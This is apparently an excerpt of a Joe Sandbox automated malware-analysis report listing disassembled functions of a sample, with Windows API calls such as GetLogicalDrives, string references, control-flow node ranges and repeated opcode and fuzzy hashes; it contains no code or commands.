                                                      • Instruction ID: 284f6efe89d00b928ff69ac649fc6bc8fb859e18c9a331378499572de6ea70b2
                                                      • Opcode Fuzzy Hash: 42038966f4a86da7ea67264ef265c9b3b4c2170751044927ea451ac103a48cc7
                                                      • Instruction Fuzzy Hash: 6571C2EB1EC125BD71C2B555AF54AFB6A6EE2C77B0B308427F407D6A02E2D44B4D9031
                                                      Function 07780A69 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 381COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 679 7780a69-7780d91 716 7780d98-7780dbb GetLogicalDrives call 7780dd3 679->716 719 7780dc0-7780ff1 call 7780e09 716->719
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 4f7bd67526b9122f27278d581a4b97713b26b5025245fd8848fa72b55ed629f5
                                                      • Instruction ID: f8395829de82b6059a54d2fb06de02433c32a9ef67d1e75c54d3400797160764
                                                      • Opcode Fuzzy Hash: 4f7bd67526b9122f27278d581a4b97713b26b5025245fd8848fa72b55ed629f5
                                                      • Instruction Fuzzy Hash: 4571E3EB2EC115BD7182B555AF54AFB6A6EE2C77B0B308427F403D6602E2D84F4D9031
                                                      Function 07780AC8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 381COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 746 7780ac8-7780ada 747 7780a79-7780ac2 746->747 748 7780adb-7780d91 746->748 747->748 783 7780d98-7780dbb GetLogicalDrives call 7780dd3 748->783 786 7780dc0-7780ff1 call 7780e09 783->786
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: 7fe46b01656e34391331bdc5a83e3ac3be50209580309774285c25a5e6c8ef27
                                                      • Instruction ID: 5802d0e196fb0a0ebddb21c590af885398e3c9e28c7f492763673fcf8f1d0637
                                                      • Opcode Fuzzy Hash: 7fe46b01656e34391331bdc5a83e3ac3be50209580309774285c25a5e6c8ef27
                                                      • Instruction Fuzzy Hash: 4271E4EB1EC115BDB282B555AF54BFBAA6EE2C77B0B308427F403D6642E2D44E4D9031
                                                      Function 07780A8C Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 813 7780a8c-7780d91 848 7780d98-7780dbb GetLogicalDrives call 7780dd3 813->848 851 7780dc0-7780ff1 call 7780e09 848->851
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 213ad47b21230348b0bad5ec832c323dab071d5cc89be3a9e362bc29823f760f
                                                      • Instruction ID: 21d64611cbc18690cf2ffe60b4aec386870a91f27833d5c7566b5103f1a0e88e
                                                      • Opcode Fuzzy Hash: 213ad47b21230348b0bad5ec832c323dab071d5cc89be3a9e362bc29823f760f
                                                      • Instruction Fuzzy Hash: C871E6EB1EC115BD7282B555AF54AFB6A6EE6C77B0B308437F803D6602E2D44E4D9031
                                                      Function 07780A7A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 374COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 878 7780a7a-7780d91 915 7780d98-7780dbb GetLogicalDrives call 7780dd3 878->915 918 7780dc0-7780ff1 call 7780e09 915->918
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 86539c1c339df113520bc1c68cc29757c75a176b55c8739d8ede0d180bf6bd91
                                                      • Instruction ID: 64c6f087ca93a3360336561e8953b96ada406b7f25a7d8e4a98fa0655fa52dae
                                                      • Opcode Fuzzy Hash: 86539c1c339df113520bc1c68cc29757c75a176b55c8739d8ede0d180bf6bd91
                                                      • Instruction Fuzzy Hash: ED71D4EB2EC115BD7282B555AF54AFBAA6EE6C77B0B308427F403D6602E2D44E4D9031
                                                      Function 07780ABB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 359COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 945 7780abb-7780d91 979 7780d98-7780dbb GetLogicalDrives call 7780dd3 945->979 982 7780dc0-7780ff1 call 7780e09 979->982
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 72ec688b4f0a51ac04d9764a2869cf09b7c5d8d8228e5b86fa5eda24bd5cfe37
                                                      • Instruction ID: 89743fb872aa420572351214436dca9a17a8e6b19a74b2370fe3370b886fab32
                                                      • Opcode Fuzzy Hash: 72ec688b4f0a51ac04d9764a2869cf09b7c5d8d8228e5b86fa5eda24bd5cfe37
                                                      • Instruction Fuzzy Hash: 1561D4EB2EC125BD72C2A555AF54AFB6A6EE2C77B0B308427F407D6602E2D44F4D9031
                                                      Function 07780B1F Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 356COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1009 7780b1f-7780b23 1010 7780ae8-7780b1a 1009->1010 1011 7780b25-7780d91 1009->1011 1010->1011 1041 7780d98-7780dbb GetLogicalDrives call 7780dd3 1011->1041 1044 7780dc0-7780ff1 call 7780e09 1041->1044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: 364ea45d7deffde352caa989f879cef96d7572c0d5e09d3fd275b90b522bc131
                                                      • Instruction ID: 4a94bc032fb564b1e7708c18c41a2a8ba1c4ed397024445a2995c45f674ede86
                                                      • Opcode Fuzzy Hash: 364ea45d7deffde352caa989f879cef96d7572c0d5e09d3fd275b90b522bc131
                                                      • Instruction Fuzzy Hash: 2061F7EB2EC115BD7182B555AF54AFB6A6EE2C77B0B308427F407D6602E2D44F4D9031
                                                      Function 07780AE4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 354COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: ef28974474dc3dd508a7c1c107f1895b7fc786fd37b422f933094294d89bda1e
                                                      • Instruction ID: d2be4859e544ebe6c0bfb2b2865e59fbb29b47860009c32d8d0f4c182777db50
                                                      • Opcode Fuzzy Hash: ef28974474dc3dd508a7c1c107f1895b7fc786fd37b422f933094294d89bda1e
                                                      • Instruction Fuzzy Hash: 4261F6EB2EC115BD7282B555AF54AFB6A6EE2C77B0B308427F803D6602E2D44F4D9031
                                                      Function 07780B0B Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 338COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 43976184a7c269674df6b92144c841b959bf20d01feed03a18fbfb9a3e288aa4
                                                      • Instruction ID: 475c6e88c988a79626b729400975cdcb055a4c278166bab990401a43bf6942df
                                                      • Opcode Fuzzy Hash: 43976184a7c269674df6b92144c841b959bf20d01feed03a18fbfb9a3e288aa4
                                                      • Instruction Fuzzy Hash: AD61E6EB2EC215BD7182B555AF54AFB6A6EE2C77B0B308427F403D6602E2D44A4DD031
                                                      Function 07780B2B Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 333COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 167cbb799df7f60c917ffe21e1d80e1f0858505d74bd834d2631a74ea393e3b0
                                                      • Instruction ID: 3f890d889ad9ef2999572bd83fc8f304a3745f088095f16a55524489274df392
                                                      • Opcode Fuzzy Hash: 167cbb799df7f60c917ffe21e1d80e1f0858505d74bd834d2631a74ea393e3b0
                                                      • Instruction Fuzzy Hash: 036126EB1EC125BD7282B555AF54AFBAA6EE2C77B0B308427F403D6602E2D44B4D9031
                                                      Function 07780B42 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 331COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: f027fabb0f908f4975b140127ac662e98189d1fc378c3d7d6f0bbd28ea6c7d5b
                                                      • Instruction ID: b2bee1a3540bc4398b6eabba4c4a08405256b254aff9bda0455b90c19d81db8d
                                                      • Opcode Fuzzy Hash: f027fabb0f908f4975b140127ac662e98189d1fc378c3d7d6f0bbd28ea6c7d5b
                                                      • Instruction Fuzzy Hash: 7E6108EB1EC215BD7282B555AB54AFB6A6EE6C77B0B308437F403D6602E2D44B4DD031
                                                      Function 07780B8B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 911a7ce40aa1def51f770e0348e11d4259bb3d0ec98c4179faa10634bfffe132
                                                      • Instruction ID: 2c910d637cffcaa5518f79960606e357130eb313779e402af8821585e8d68f00
                                                      • Opcode Fuzzy Hash: 911a7ce40aa1def51f770e0348e11d4259bb3d0ec98c4179faa10634bfffe132
                                                      • Instruction Fuzzy Hash: 425128EB1EC215BD62C2B555EB54AFB6A6EE6C77B0B308427F407D2602E2D44B4DD031
                                                      Function 07780BE8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 92643d169a2e979c9d39b0da26c4453ec4623bfa1d81e751ab85686cbce1eb36
                                                      • Instruction ID: 17a3ada32dd9b567bc728c437d1685c3578f78b06bd9a365ba06d5e79b52114c
                                                      • Opcode Fuzzy Hash: 92643d169a2e979c9d39b0da26c4453ec4623bfa1d81e751ab85686cbce1eb36
                                                      • Instruction Fuzzy Hash: 1C5148EB2EC214BDB282B555EB54AF7676EE6C77B0B30842BF403D6502E2D54A4DD031
                                                      Function 07780BA5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: b63de0160278a98a5c416050dfbff41c9311a00d736268c351429e5cdf633ff8
                                                      • Instruction ID: 8e802496465aa1a1d1c1613b1029d08bf470a4ec3931ce5e72d054c904210b85
                                                      • Opcode Fuzzy Hash: b63de0160278a98a5c416050dfbff41c9311a00d736268c351429e5cdf633ff8
                                                      • Instruction Fuzzy Hash: C45136EB1EC215BD62C2B551EB54AFB6A6EE6C73B0B30842BF403D2602E2D44A4DD031
                                                      Function 07780BF8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: dd03a831e57ac1634e142b33a4179c474e8152d57ff36c70f3a04696c66ffc9a
                                                      • Instruction ID: e8ab0e56a952048616c0bb0306d84c9d6e0cbfb7de92c373c6510323d7dc7855
                                                      • Opcode Fuzzy Hash: dd03a831e57ac1634e142b33a4179c474e8152d57ff36c70f3a04696c66ffc9a
                                                      • Instruction Fuzzy Hash: 2B5149EB1EC214BDB2C2B555DB58AF76B6EE6C76B0B30842BF403C5502E2D54A4DD131
                                                      Function 07780B96 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 287COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: cc746d2378b4b68c7478b5978906ef94bc16dbb15410f4ade22eece1668d1f31
                                                      • Instruction ID: 07d4476987c4621c46b74df327369ddf332c9e087a43330c6e25f2eec21ed984
                                                      • Opcode Fuzzy Hash: cc746d2378b4b68c7478b5978906ef94bc16dbb15410f4ade22eece1668d1f31
                                                      • Instruction Fuzzy Hash: A65126EB1EC215BD62C2B555EB94AFB6A6EE6C77B0B308427F407D2602E2D44B4DD031
                                                      Function 07780C31 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 285COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\
                                                      • API String ID: 0-1047444362
                                                      • Opcode ID: 01500842a172636a943e61a3d30d28195e14ea5c9547d6f177a6a3c493844e4b
                                                      • Instruction ID: 325d2d3275ecb5f81ed0965acdbe18a308ed3e0241d7a16aa2088cc0c5a5af54
                                                      • Opcode Fuzzy Hash: 01500842a172636a943e61a3d30d28195e14ea5c9547d6f177a6a3c493844e4b
                                                      • Instruction Fuzzy Hash: F85128EB1EC215BD72C2B455DB54AFB6A6EE6C77B0B30842BF407D2602E2D54A4DD031
                                                      Function 07780BBD Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: fc978c0203984155656380beaac51a0b18df6418202f4c437b50c126d6e73822
                                                      • Instruction ID: 0fb63aae67dde6bb21800b2feb3549e7db90af90a2e4e69e44b56193d6ba66d6
                                                      • Opcode Fuzzy Hash: fc978c0203984155656380beaac51a0b18df6418202f4c437b50c126d6e73822
                                                      • Instruction Fuzzy Hash: AB51F6EB1EC215BD7282B555EB54AFB6A6EE6C77B0B30842BF407D2602E2D44A4DD031
                                                      Function 07780BCB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: ee8e27b789dc65137500cca3bb18e4890125310ef3c2470a0037c32316586f67
                                                      • Instruction ID: e8d8fa607948935a0ef53f0c10ee02436569e6010474caf8ac53afe2188def2b
                                                      • Opcode Fuzzy Hash: ee8e27b789dc65137500cca3bb18e4890125310ef3c2470a0037c32316586f67
                                                      • Instruction Fuzzy Hash: 8E5129EB1EC214BD72C2B455EB54AF76A6EE2C77B0B30842BF403D6602E2D54A4DD031
                                                      Function 07780C5A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 53d5b9e3cffb90f985a5741aaadfe1bf6dca902ec2266cf46fd505cd3e5fe4cd
                                                      • Instruction ID: e9349d1f2c24d31ca3024fc7231eea50415666a65b3bad5f2d4da55fe3e13461
                                                      • Opcode Fuzzy Hash: 53d5b9e3cffb90f985a5741aaadfe1bf6dca902ec2266cf46fd505cd3e5fe4cd
                                                      • Instruction Fuzzy Hash: C15128EB1EC215BD7282B555DB98AFBA66EE6C77B0B30842BF403D1602E2D54E4DD031
                                                      Function 07780C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 5381efe8d4d6c2500bffec8d12f6f34f8bf06bdc30a296daf20f4db009c1b604
                                                      • Instruction ID: 4b5e57c200171aa9f900e4b810698e6c89030ff748f78afb6389e0180c4e618a
                                                      • Opcode Fuzzy Hash: 5381efe8d4d6c2500bffec8d12f6f34f8bf06bdc30a296daf20f4db009c1b604
                                                      • Instruction Fuzzy Hash: F15138EB1EC214BD7282B555EB98AFB666EE6D77B0B30842BF403D1602E2D44E4D9031
                                                      Function 07780C69 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 63130f3bb128d9b67eac987bcbadb1873abf9353b5319f96e6097f07b8623e83
                                                      • Instruction ID: 5ef3a70fc0adaf265587b2cd0399168f0bce78b2bcdb1cac12ca0a3edbfea2b1
                                                      • Opcode Fuzzy Hash: 63130f3bb128d9b67eac987bcbadb1873abf9353b5319f96e6097f07b8623e83
                                                      • Instruction Fuzzy Hash: CB5127EB2EC114BD7282B551AB94AFB6B6EE6C77B0B30843BF403D5502E2D54B4D9131
                                                      Function 07780C82 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\$A:\
                                                      • API String ID: 999431828-1047444362
                                                      • Opcode ID: 06b90d1bc8e6e54b7a157af634f38e243d74973ae04bc7511714182ac5eee513
                                                      • Instruction ID: a718ecdb0df854a88b248ea6676e09bc55ebd188c2abf0c51b87ab904280542f
                                                      • Opcode Fuzzy Hash: 06b90d1bc8e6e54b7a157af634f38e243d74973ae04bc7511714182ac5eee513
                                                      • Instruction Fuzzy Hash: 24411AEB2EC114BE7282B551AB58AFB666EE6D77B0B30843BF403D5502E2D54F4D9031
                                                      Function 077D00D4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: e4fd9a787d2a6eef091b1185fb3844030aaf8c46d1cb6bc8a0a623f9ff4bbaba
                                                      • Instruction ID: a7737adc59fe4a1ba029a8a1c71f9372b192bdf6e317656aa28f54b23de09140
                                                      • Opcode Fuzzy Hash: e4fd9a787d2a6eef091b1185fb3844030aaf8c46d1cb6bc8a0a623f9ff4bbaba
                                                      • Instruction Fuzzy Hash: 705116EB16D121BE620280451B24AFA2A7EE6D77B0F30A42AF407D7642F3D94E49D071
                                                      Function 077D008F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: lI2;
                                                      • API String ID: 0-1938070717
                                                      • Opcode ID: d138ebdcedaf95385db0809bfe75a9550c0069eb6a5983886a1220ab5d8241cf
                                                      • Instruction ID: 00b074d321c32dd3a1c0093b28660f6aa744c87f7a1d46e2d546207d0a3cc1d6
                                                      • Opcode Fuzzy Hash: d138ebdcedaf95385db0809bfe75a9550c0069eb6a5983886a1220ab5d8241cf
                                                      • Instruction Fuzzy Hash: 0F4126EB16C121BE6102C0855B68EFA2A7EE6D77B0F30A42AB407D7642F3D94E49D071
                                                      Function 07780CC8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 7415abc3e86f0d48acb16d7305eae93f145cf86ec90ea9e4bf3ffdb12d539729
                                                      • Instruction ID: b6280ed184debf75b2967dc25cfd4eb6ea3b909fbe5a568f22661c4365247eaf
                                                      • Opcode Fuzzy Hash: 7415abc3e86f0d48acb16d7305eae93f145cf86ec90ea9e4bf3ffdb12d539729
                                                      • Instruction Fuzzy Hash: 9E412BEB2EC115BD7282B555AB58AFBA66EE6C77B0B30843BF407D2502E2D54F0D9031
                                                      Function 07780CE3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 648050de862f593c2f048bef1ee0dd300df5403cf902d150eb21453c315fcbf6
